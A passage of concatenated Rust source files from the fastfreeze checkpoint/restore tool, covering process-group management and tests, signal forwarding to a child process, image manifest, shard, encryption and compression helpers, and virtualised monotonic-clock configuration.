ensure!(signal_hook::low_level::unregister(sig_hook_id), "signal_hook failed to unregister"); } Ok(()) } } impl Drop for ProcessGroup { fn drop(&mut self) { let _ = self.terminate() .map_err(|e| error!("Skipping children termination: {}", e)); } } pub trait ProcessExt { fn join(self, pgrp: &mut ProcessGroup) -> ProcessHandle; fn join_as_non_killable(self, pgrp: &mut ProcessGroup) -> ProcessHandle; fn join_as_daemon(self, pgrp: &mut ProcessGroup) -> ProcessHandle; } impl ProcessExt for Process { fn join(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(self) } fn join_as_non_killable(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(ProcessMembership::from(self).non_killable()) } fn join_as_daemon(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(ProcessMembership::from(self).daemon()) } } #[cfg(test)] mod test { use super::*; use super::super::*; use nix::sys::signal::Signal; fn new_process_group() -> Result<ProcessGroup> { let kill_grace_period = Duration::from_secs_f32(0.3); ProcessGroup::with_kill_grace_period(kill_grace_period) } #[test] fn test_basic_kill() -> Result<()> { let mut pgrp = new_process_group()?; Command::new(&["sleep", "1000"]) .spawn()? .join(&mut pgrp); // drops and kills sleep Ok(()) } #[test] fn test_wait_success() -> Result<()> { let mut pgrp = new_process_group()?; pgrp.add(Command::new(&["true"]).spawn()?); pgrp.add(Command::new(&["sleep"]).arg("0.2").spawn()?); pgrp.wait_for_success() } #[test] fn test_exit_fail() -> Result<()> { let mut pgrp = new_process_group()?; pgrp.add(Command::new(&["true"]).spawn()?); pgrp.add(Command::new(&["sleep"]).arg("1000").spawn()?); pgrp.add(Command::new(&["false"]).spawn()?); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("false")); assert!(err_msg.contains("exit_code=1")); Ok(()) } #[test] fn test_exit_fail_multiple() -> Result<()> { let mut cmd1 = Command::new(&["bash", "-c", "exit 2"]).spawn()?; let mut cmd2 = Command::new(&["false"]).spawn()?; let cmd3 = Command::new(&["sleep"]).arg("1000").spawn()?; cmd1.wait()?; cmd2.wait()?; let mut pgrp = new_process_group()?; pgrp.add(cmd1); pgrp.add(cmd2); pgrp.add(cmd3); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("bash")); assert!(err_msg.contains("exit_code=2")); assert!(err_msg.contains("false")); assert!(err_msg.contains("exit_code=1")); Ok(()) } #[test] fn test_signaled() -> Result<()> { let cmd = Command::new(&["sleep", "1000"]).spawn()?; cmd.kill(Signal::SIGTERM)?; let mut pgrp = new_process_group()?; pgrp.add(cmd); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("sleep")); assert!(err_msg.contains("caught fatal SIGTERM")); Ok(()) } #[test] fn test_unkillable() -> Result<()> { let start_time = Instant::now(); let mut pgrp = new_process_group()?; Command::new(&["sleep", "1"]).spawn()? .join_as_non_killable(&mut pgrp); drop(pgrp); println!("elapsed time {}ms", start_time.elapsed().as_millis()); assert!(start_time.elapsed().as_millis() >= 1000); Ok(()) } #[test] fn test_daemon() -> Result<()> { let start_time = Instant::now(); let mut pgrp = new_process_group()?; Command::new(&["sleep", "1000"]).spawn()? .join_as_daemon(&mut pgrp); pgrp.wait_for_success()?; println!("elapsed time {}ms", start_time.elapsed().as_millis()); assert!(start_time.elapsed().as_secs() < 1000); Ok(()) } #[test] fn test_get_mut() -> Result<()> { let mut cmd1 = Command::new(&["bash", "-c", "exit 2"]).spawn()?; let mut cmd2 = Command::new(&["false"]).spawn()?; cmd1.wait()?; cmd2.wait()?; let mut pgrp = new_process_group()?; let ps1 = pgrp.add(cmd1); let ps2 = pgrp.add(cmd2); // processes should still be accessible after terminate() pgrp.terminate()?; assert_eq!(pgrp.get_mut(ps1).wait()?.code().unwrap(), 2); assert_eq!(pgrp.get_mut(ps2).wait()?.code().unwrap(), 1); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/error.rs
src/process/error.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ os::unix::process::ExitStatusExt, convert::TryFrom, process::ExitStatus, fmt, }; use nix::sys::signal::Signal; use serde_json::Value; use crate::util::JsonMerge; use super::stderr_logger::StderrTail; #[derive(Debug)] pub struct ProcessError { pub exit_status: ExitStatus, pub display_cmd: String, pub stderr_tail: Option<StderrTail>, } impl ProcessError { pub fn to_json(&self) -> Value { self.stderr_tail.as_ref().map(|st| json!({ st.log_prefix.as_ref(): { "exit_status": self.formatted_exit_status(), "log": &st.tail, } })).unwrap_or_else(|| json!({})) } pub fn formatted_exit_status(&self) -> String { if let Some(exit_code) = self.exit_status.code() { format!("failed with exit_code={}", exit_code) } else if let Some(signal) = self.exit_status.signal() { let signal = Signal::try_from(signal) .map_or_else(|_| format!("signal {}", signal), |s| s.to_string()); format!("caught fatal {}", signal) } else { format!("Unexpected child exit status {:?}", self.exit_status) } } } impl fmt::Display for ProcessError { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { // We don't display the stderr_tail in the error message because it's // already on screen. The stderr_tail is used when emitting metrics. write!(f, "`{}` {}", self.display_cmd, self.formatted_exit_status()) } } impl std::error::Error for ProcessError {} #[derive(Debug)] pub struct ProcessGroupError { pub errors: Vec<ProcessError>, } impl fmt::Display for ProcessGroupError { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.errors.iter() .map(|e| e.to_string()) .collect::<Vec<_>>() .join(", ")) } } impl std::error::Error for ProcessGroupError {} impl ProcessGroupError { pub fn to_json(&self) -> Value { self.errors.iter() .map(|e| e.to_json()) .fold(json!({}), |a,b| a.merge(b)) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/mod.rs
src/process/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod command; mod process_group; #[allow(clippy::module_inception)] mod process; mod spawn_with_pid; mod stderr_logger; mod error; mod monitor; pub use command::{Command, PipeCommandExt, Stdio, EnvVars}; pub use process::{Process, Output}; pub use process_group::{ProcessExt, ProcessGroup}; pub use error::{ProcessError, ProcessGroupError}; pub use spawn_with_pid::{CommandPidExt, set_ns_last_pid, spawn_set_ns_last_pid_server, MIN_PID}; pub use monitor::{monitor_child, ChildDied};
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/monitor.rs
src/process/monitor.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use nix::{ sys::signal::{kill, pthread_sigmask, Signal, SigmaskHow, SigSet}, sys::wait::{wait, WaitStatus}, unistd::Pid }; use crate::cli::ExitCode; #[derive(Debug)] pub enum ChildDied { Exited(u8), Signaled(Signal), } impl std::error::Error for ChildDied {} impl std::fmt::Display for ChildDied { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { match self { ChildDied::Exited(exit_code) => write!(f, "Application exited with exit_code={}", exit_code), ChildDied::Signaled(signal) => write!(f, "Application caught fatal signal {}", signal), } } } /// `monitor_child()` monitors a child (good for assuming the init role). /// We do the following: /// 1) We proxy signals we receive to our `pid_child` /// 2) We reap processes that get reparented to us, although this should not happen for /// the application process tree, as we set PR_SET_CHILD_SUBREAPER on the application root process. /// 3) When `pid_child` dies, we return an error that contains the appropriate exit_code. /// If the child exited normally, we return Ok(()). /// XXX We don't unregister signals after this function. The caller is expected to exit right after. pub fn monitor_child(pid_child: Pid) -> Result<()> { use libc::c_int; for sig in Signal::iterator() { // We don't forward SIGCHLD, and neither `FORBIDDEN` signals (e.g., // SIGSTOP, SIGFPE, SIGKILL, ...) if sig == Signal::SIGCHLD || signal_hook::consts::FORBIDDEN.contains(&(sig as c_int)) { continue; } // Forward signal to our child. // The `register` function is unsafe because one could call malloc(), // and deadlock the program. Here we call kill() which is safe. unsafe { signal_hook::low_level::register(sig as c_int, move || { let _ = kill(pid_child, sig); })?; } } pthread_sigmask(SigmaskHow::SIG_UNBLOCK, Some(&SigSet::all()), None)?; loop { match wait()? { WaitStatus::Exited(pid, 0) if pid == pid_child => { return Ok(()); } WaitStatus::Exited(pid, exit_status) if pid == pid_child => { // When the monitored application dies, the children if any, will get // reparented to us (or whoever is the init process). // That's fine. We are going to exit, and the container will die, killing // all the orphans. return Err(anyhow!(ChildDied::Exited(exit_status as u8)) .context(ExitCode(exit_status as u8))); } WaitStatus::Signaled(pid, signal, _core_dumped) if pid == pid_child => { return Err(anyhow!(ChildDied::Signaled(signal)) .context(ExitCode(128 + signal as u8))); } _ => {}, }; } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/manifest.rs
src/image/manifest.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use serde::{Serialize, Deserialize}; use crate::{ consts::*, store::{Store, FileExt}, }; use super::{Compression, Encryption}; use std::fmt; // The image manifest is what describes how to consume an image. // It holds version, shard location, and compression used. pub enum ManifestFetchResult { Some(ImageManifest), VersionMismatch { fetched: String, desired: String }, NotFound, } #[derive(Serialize, Deserialize)] pub struct ImageManifest { pub version: String, pub num_shards: u32, pub encryption: Option<Encryption>, pub compression: Option<Compression>, pub shard_prefix: String, } impl ImageManifest { /// Make a new image manifest. The shard_prefix is INVOCATION_ID which is picked at random. /// This can make it easier to tie metrics and log files to a specific checkpoint command. pub fn new(num_shards: u32, encrypt: bool, compression: Option<Compression>) -> Self { Self { version: String::from(CURRENT_IMG_VERSION), shard_prefix: INVOCATION_ID.clone(), encryption: if encrypt { Some(Encryption::default()) } else { None }, compression, num_shards, } } pub fn to_json(&self) -> String { // unwrap() is safe. The JSON serialization can't fail. serde_json::to_string(self).unwrap() } pub fn from_json(manifest_json: &str, allow_bad_image_version: bool) -> Result<ManifestFetchResult> { use ManifestFetchResult::*; // We first parse the JSON uninterpreted to check for the version. // If we have a match, we proceed to destructuring the JSON into our ImageDescriptor. let manifest: serde_json::Value = serde_json::from_str(manifest_json) .with_context(|| format!("Malformed json: {}", manifest_json))?; Ok(if manifest["version"] == CURRENT_IMG_VERSION || allow_bad_image_version { let manifest = serde_json::from_value(manifest) .with_context(|| format!("Failed to parse image descriptor: {}", manifest_json))?; Some(manifest) } else { VersionMismatch { fetched: manifest["version"].to_string(), desired: CURRENT_IMG_VERSION.to_string(), } }) } pub fn persist_to_store(&self, store: &dyn Store) -> Result<()> { store.file(MANIFEST_FILE_NAME).write("upload manifest", &self.to_json().as_bytes()) } pub fn fetch_from_store(store: &dyn Store, allow_bad_image_version: bool) -> Result<ManifestFetchResult> { Ok(match store.file(MANIFEST_FILE_NAME).try_read("download manifest")? { Some(manifest_json) => Self::from_json(&String::from_utf8_lossy(&manifest_json), allow_bad_image_version)?, None => ManifestFetchResult::NotFound, }) } } impl fmt::Display for ImageManifest { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "version={}, num_shards={} compression={} encryption={} prefix={}", self.version, self.num_shards, self.compression.as_ref().map_or_else(|| "none".to_string(), |d| format!("{}", d)), self.encryption.as_ref().map_or_else(|| "none".to_string(), |d| format!("{}", d)), self.shard_prefix) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/shard.rs
src/image/shard.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::path::PathBuf; use super::ImageManifest; use crate::store::Store; fn shard_filename(shard_prefix: &str, shard_index: u32) -> String { // .ffs stands for fastfreeze shard format!("{}-{}.ffs", shard_prefix, shard_index+1) } pub fn upload_cmds( img_manifest: &ImageManifest, passphrase_file: Option<&PathBuf>, store: &dyn Store, ) -> Result<Vec<String>> { let cmd_common = { let mut cmd = Vec::new(); if let Some(ref compression) = img_manifest.compression { cmd.push(compression.compress_cmd().to_string()); } if let Some(ref encryption) = img_manifest.encryption { let passphrase_file = passphrase_file.ok_or_else(|| anyhow!( "The image must be encrypted. Use --passphrase-file to provide an encryption passphrase"))?; cmd.push(encryption.encrypt_cmd(passphrase_file.as_path())); } cmd }; Ok((0..img_manifest.num_shards).map(|shard_index| { let file = store.file(&shard_filename(&img_manifest.shard_prefix, shard_index)); let mut cmd = cmd_common.clone(); cmd.push(file.upload_shell_cmd()); cmd.join(" | ") }).collect()) } pub fn download_cmds( img_manifest: &ImageManifest, passphrase_file: Option<&PathBuf>, store: &dyn Store ) -> Result<Vec<String>> { let cmd_common = { let mut cmd = Vec::new(); if let Some(ref encryption) = img_manifest.encryption { let passphrase_file = passphrase_file.ok_or_else(|| anyhow!( "The image is encrypted. Use --passphrase-file to provide an encryption passphrase"))?; cmd.push(encryption.decrypt_cmd(passphrase_file.as_path())); info!("Decrypting image with passphrase from file {}", passphrase_file.display()); } if let Some(ref compression) = img_manifest.compression { cmd.push(compression.decompress_cmd().to_string()); } cmd }; Ok((0..img_manifest.num_shards).map(|shard_index| { let file = store.file(&shard_filename(&img_manifest.shard_prefix, shard_index)); let mut cmd: Vec<String> = vec![file.download_shell_cmd()]; cmd.append(&mut cmd_common.clone()); cmd.join(" | ") }).collect()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/encryption.rs
src/image/encryption.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ path::Path, fmt, }; use serde::{Serialize, Deserialize}; use crate::consts::*; #[derive(Serialize, Deserialize)] pub struct Encryption { pub cipher: String, } impl Encryption { pub fn new(cipher: String) -> Self { Self { cipher } } pub fn encrypt_cmd(&self, passphrase_file: &Path) -> String { format!("openssl enc -e -{} -pbkdf2 -pass file:{}", self.cipher, passphrase_file.display()) } pub fn decrypt_cmd(&self, passphrase_file: &Path) -> String { format!("openssl enc -d -{} -pbkdf2 -pass file:{}", self.cipher, passphrase_file.display()) } } impl Default for Encryption { fn default() -> Self { Self::new(DEFAULT_ENCRYPTION_CIPHER.to_string()) } } impl fmt::Display for Encryption { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.cipher) } } pub fn check_passphrase_file_exists(passphrase_file: &Path) -> Result<()> { ensure!(passphrase_file.exists(), "The passphrase file {} is not accessible", passphrase_file.display()); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/mod.rs
src/image/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod compression; mod encryption; mod manifest; pub mod shard; pub use manifest::{ManifestFetchResult, ImageManifest}; pub use compression::{Compression, CpuBudget}; pub use encryption::{Encryption, check_passphrase_file_exists};
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/compression.rs
src/image/compression.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use serde::{Serialize, Deserialize}; use std::{ str::FromStr, fmt, }; #[derive(Debug, Serialize, Deserialize)] pub enum Compression { Lz4, Zstd, } impl Compression { pub fn compress_cmd(&self) -> &str { match self { Compression::Lz4 => "lz4 -1 - -", Compression::Zstd => "zstd -1 - -", } } pub fn decompress_cmd(&self) -> &str { match self { Compression::Lz4 => "lz4 -d - -", Compression::Zstd => "zstd -d - -", } } } impl fmt::Display for Compression { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { Compression::Lz4 => write!(f, "lz4"), Compression::Zstd => write!(f, "zstd"), } } } impl From<CpuBudget> for Option<Compression> { fn from(cpu_budget: CpuBudget) -> Self { match cpu_budget { CpuBudget::Low => None, CpuBudget::Medium => Some(Compression::Lz4), CpuBudget::High => Some(Compression::Zstd), } } } #[derive(Debug, PartialEq, Copy, Clone, Serialize)] pub enum CpuBudget { Low, Medium, High, } impl FromStr for CpuBudget { type Err = anyhow::Error; fn from_str(s: &str) -> std::result::Result<Self, Self::Err> { Ok(match s { "low" => CpuBudget::Low, "medium" => CpuBudget::Medium, "high" => CpuBudget::High, _ => bail!("Possible values are [low, medium, high], not `{}`", s) }) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/virt/time.rs
src/virt/time.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ mem::{size_of, MaybeUninit}, os::unix::io::AsRawFd, path::Path, io::prelude::*, slice, fs, }; use nix::{ unistd::{lseek, Whence}, errno::Errno, }; use libc::timespec; use crate::{ consts::*, util::{pwrite_all, get_file_size}, }; // This file contains logic to configure libvirttime. In a nutshell, libvirttime // is used to virtualize the CLOCK_MONOTONIC values for the application. The // library is configured via an external file that contains all the clock time // offsets to be applied. // // The config file has the following format: // static struct virt_time_config { // struct timespec ts_offset; // struct timespec per_thread_ts[PID_MAX]; // }; // // There is a global time offset, and a per thread time offset. All must be // adjusted when migrating an app from a machine to another. // // More details can be found at https://github.com/twosigma/libvirttime // `PID_MAX` is defined in the kernel in include/linux/threads.h // We don't read /proc/sys/kernel/pid_max because it can vary // from machine to machine. const PID_MAX: u32 = 4_194_304; const NSEC_IN_SEC: Nanos = 1_000_000_000; /// File position of virt_time_config.thread_confs[0] const PID_0_FPOS: i64 = size_of::<timespec>() as i64; /// sizeof(struct per_thread_conf) const PROCESS_AREA_SIZE: usize = size_of::<timespec>(); /// We represent a `timespec` with the nanosecs as a i128. It's easier to do /// computation with. `Duration` is not suitable for us as it lack support /// underflowing substractions. pub type Nanos = i128; #[cfg(not(test))] fn clock_gettime_monotonic() -> Nanos { unsafe { let mut ts = MaybeUninit::<timespec>::uninit(); let res = libc::clock_gettime(libc::CLOCK_MONOTONIC, ts.as_mut_ptr()); let value = nix::errno::Errno::result(res).expect("clock_gettime() failed"); assert_eq!(value, 0); Nanos::from_timespec(ts.assume_init()) } } #[cfg(test)] fn clock_gettime_monotonic() -> Nanos { test::clock_gettime_mock() } trait NanosExt { fn to_timespec(self) -> timespec; fn from_timespec(ts: timespec) -> Self; } impl NanosExt for Nanos { fn to_timespec(self) -> timespec { let mut ts = timespec { tv_sec: (self / NSEC_IN_SEC) as i64, tv_nsec: (self % NSEC_IN_SEC) as i64, }; // nsec should always be positive as the libvirttime code assumes nsec is between 0 and // NSEC_IN_SEC-1. See https://github.com/twosigma/libvirttime/blob/master/src/util.h#L48 if ts.tv_nsec < 0 { ts.tv_sec -= 1; ts.tv_nsec += NSEC_IN_SEC as i64; } ts } fn from_timespec(ts: timespec) -> Self { ts.tv_sec as i128 * NSEC_IN_SEC + ts.tv_nsec as i128 } } fn read_timespec<R: Read>(reader: &mut R) -> Result<Nanos> { unsafe { let mut ts = MaybeUninit::<timespec>::uninit(); let mut buf = slice::from_raw_parts_mut( ts.as_mut_ptr() as *mut u8, size_of::<timespec>() ); reader.read_exact(&mut buf) .context("Failed to read from the time config file")?; Ok(Nanos::from_timespec(ts.assume_init())) } } fn write_timespec_at(file: &fs::File, nanos: Nanos, fpos: i64) -> Result<()> { unsafe { let ts = nanos.to_timespec(); let buf = slice::from_raw_parts( &ts as *const timespec as *const u8, size_of::<timespec>() ); pwrite_all(file, &buf, fpos) .context("Failed to write to the time config file")?; Ok(()) } } pub struct ConfigPath<'a> { path: &'a Path, } impl<'a> ConfigPath<'a> { pub fn new<S: AsRef<Path>>(path: &'a S) -> Self { // We don't open the config file at this point. Depending on the // operation, we might create, open_read, or open_write the file. Self { path: path.as_ref() } } /// Returns the current configured time offset fn read_configured_offset(&self) -> Result<Nanos> { let mut config_file = fs::File::open(&self.path) .with_context(|| format!("Failed to open {}. \ It is normally created when running the application for the \ first time via the 'run' command", self.path.display()))?; let ts_offset = read_timespec(&mut config_file)?; Ok(ts_offset) } /// Returns the offset to write in the time config file so that if the /// application were to call `clock_gettime(CLOCK_MONOTONIC)` immediately, it /// would get `app_clock`. fn config_time_offset(app_clock: Nanos) -> Nanos { let machine_clock = clock_gettime_monotonic(); machine_clock - app_clock } /// `read_current_app_clock()` returns the same result as what the application, /// virtualized with libvirttime, would get if it were to call /// `clock_gettime(CLOCK_MONOTONIC)`. pub fn read_current_app_clock(&self) -> Result<Nanos> { let config_offset = self.read_configured_offset()?; let machine_clock = clock_gettime_monotonic(); let app_clock = machine_clock - config_offset; Ok(app_clock) } fn expected_file_size() -> u64 { Self::pid_to_fpos(PID_MAX+1) as u64 } pub fn write_intial(&self) -> Result<()> { || -> Result<_> { // We arbitrarily start the app clock at 0. let app_clock = 0; // The time config file must be writable by all users as we are // applying a system-wide virtualization configuration. let config_file = fs::File::create(&self.path) .context("File creation failed")?; // The config_file has the layout of the `struct virt_time_config` write_timespec_at(&config_file, Self::config_time_offset(app_clock), 0)?; // We make a bunch of holes in the file. We start empty. config_file.set_len(Self::expected_file_size()) .context("ftruncate failed")?; Ok(()) }().with_context(|| format!("Failed to create {}", self.path.display())) } /// PID to file position in the config file fn pid_to_fpos(pid: u32) -> i64 { PID_0_FPOS + (pid as i64)*(PROCESS_AREA_SIZE as i64) } /// file position to PID (rounded down) fn fpos_to_pid(fpos: i64) -> u32 { ((fpos - PID_0_FPOS)/(PROCESS_AREA_SIZE as i64)) as u32 } /// Rewrite time offsets with the desired `app_clock` pub fn adjust_timespecs(&self, app_clock: Nanos) -> Result<()> { || -> Result<_> { let mut config_file = fs::OpenOptions::new() .read(true) .write(true) .open(&self.path)?; ensure!(get_file_size(&mut config_file)? == Self::expected_file_size(), "{} has an incorrect file size", self.path.display()); let new_time_offset = Self::config_time_offset(app_clock); let old_time_offset = read_timespec(&mut config_file)?; let old_to_new_time_offset = new_time_offset - old_time_offset; // Adjust the global timespec offset write_timespec_at(&config_file, new_time_offset, 0)?; let mut pid: u32 = 1; // pid=0 does not exist // Adjust the threads timespec offsets loop { // With SEEK_DATA, we'll be skipping pages that have no pids. // It seeks to the earlist file position that has data. Typically, // we'll be hitting a page boundary. let fpos = match lseek(config_file.as_raw_fd(), Self::pid_to_fpos(pid), Whence::SeekData) { Err(e) if e.as_errno() == Some(Errno::ENXIO) => break, Err(e) => bail!("seek failed: {}", e), Ok(fpos) => fpos, }; // Note: performance could be better as we are doing two // syscalls (read+write) per pid. We could improve this to only // do two syscalls per page. But that's for another time. // Compute the pid corresponding to the file position pid = Self::fpos_to_pid(fpos); assert!(pid <= PID_MAX); // `fpos_to_pid()` rounds down. If the returned `fpos` does not // correspond to the file position of the `pid`, the file // position is at a data page boundary. We can skip that pid as // we are sure that pid is unused. // // |pid ......|pid+1 ......| // ... hole >|< data ... // ^ // \ file_offset // if fpos == Self::pid_to_fpos(pid) { // Read the current timespec, adjust it, and write it back let mut offset = read_timespec(&mut config_file)?; offset += old_to_new_time_offset; write_timespec_at(&config_file, offset, fpos)?; } pid += 1; } Ok(()) }().with_context(|| format!( "Failed to adjust timespecs in {}", self.path.display())) } } impl<'a> Default for ConfigPath<'a> { fn default() -> Self { Self::new(&*VIRT_TIME_CONF_PATH) } } #[cfg(test)] mod test { use super::*; use std::sync::Mutex; use std::io::SeekFrom; lazy_static! { static ref MACHINE_CLOCK: Mutex<Nanos> = Mutex::new(-1); } pub fn clock_gettime_mock() -> Nanos { *MACHINE_CLOCK.lock().unwrap() } #[test] fn test() -> Result<()> { let config_path = Path::new("/tmp/ff-test-time-conf"); let _ = std::fs::remove_file(&config_path); let config = ConfigPath::new(&config_path); fn read_pid_ts(config_file: &mut fs::File, pid: u32) -> Result<Nanos> { config_file.seek(SeekFrom::Start(ConfigPath::pid_to_fpos(pid) as u64))?; read_timespec(config_file) } assert!(config.read_configured_offset().is_err()); // Clock offset is set to 100, app clock is 0. let mut machine_clock = NSEC_IN_SEC + 100; let mut app_clock = 0; *MACHINE_CLOCK.lock().unwrap() = machine_clock; config.write_intial()?; let mut config_file = fs::OpenOptions::new() .read(true) .write(true) .open(&config.path)?; assert_eq!(config.read_configured_offset()?, machine_clock); assert_eq!(config.read_current_app_clock()?, 0); // Clock advances by 1000, so app_clock should be 1000 machine_clock += 1000; app_clock += 1000; *MACHINE_CLOCK.lock().unwrap() = machine_clock; assert_eq!(config.read_current_app_clock()?, app_clock); write_timespec_at(&config_file, machine_clock + 100, ConfigPath::pid_to_fpos(1))?; write_timespec_at(&config_file, machine_clock + 101, ConfigPath::pid_to_fpos(10000))?; write_timespec_at(&config_file, machine_clock + 102, ConfigPath::pid_to_fpos(20000))?; write_timespec_at(&config_file, machine_clock + 103, ConfigPath::pid_to_fpos(20001))?; write_timespec_at(&config_file, machine_clock + 104, ConfigPath::pid_to_fpos(PID_MAX))?; assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?); assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?); assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?); assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?); assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?); // Now let's pretend we checkpoint and move to another machine. // app clock is still 1000, but we land on a machine whose clock with a clock in the future machine_clock = 10*NSEC_IN_SEC + 100; *MACHINE_CLOCK.lock().unwrap() = machine_clock; config.adjust_timespecs(app_clock)?; // the app clock we want assert_eq!(config.read_current_app_clock()?, app_clock); assert_eq!(machine_clock + 100, 